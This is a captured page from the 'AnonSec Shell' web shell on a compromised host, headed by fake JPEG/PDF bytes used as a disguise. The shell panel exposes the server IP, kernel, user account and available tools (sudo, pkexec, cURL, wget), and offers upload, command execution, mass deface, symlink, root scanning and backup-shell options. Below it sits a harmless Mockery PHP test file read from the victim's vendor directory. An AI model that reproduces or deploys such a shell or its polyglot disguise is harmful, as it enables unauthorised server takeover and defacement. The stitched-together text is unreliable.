ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY AnonSec Shell
AnonSec Shell
Server IP : 157.90.209.209  /  Your IP : 216.73.216.129   [ Reverse IP ]
Web Server : Apache
System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64
User : evidenciarevista ( 1049)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Domains : 216 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/evidenciarevista/_api/vendor/mockery/mockery/tests/Mockery/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/evidenciarevista/_api/vendor/mockery/mockery/tests/Mockery/Php72LanguageFeaturesTest.php
<?php

namespace test\Mockery;

use Mockery\Adapter\Phpunit\MockeryTestCase;

/**
 * @requires PHP 7.2.0-dev
 */
class Php72LanguageFeaturesTest extends MockeryTestCase
{
    /** @test */
    public function it_can_mock_a_class_with_an_object_argument_type_hint()
    {
        $mock = mock(ArgumentObjectTypeHint::class);
        $object = new \stdClass;
        $mock->allows()->foo($object);

        $mock->foo($object);
    }
    
    /** @test */
    public function it_can_mock_a_class_with_an_object_return_type_hint()
    {
        $mock = spy(ReturnTypeObjectTypeHint::class);

        $object = $mock->foo();

        $this->assertTrue(is_object($object));
    }
}

class ArgumentObjectTypeHint 
{
    function foo(object $foo) {}
}

class ReturnTypeObjectTypeHint 
{
    function foo(): object {}
}

Anon7 - 2022
AnonSec Team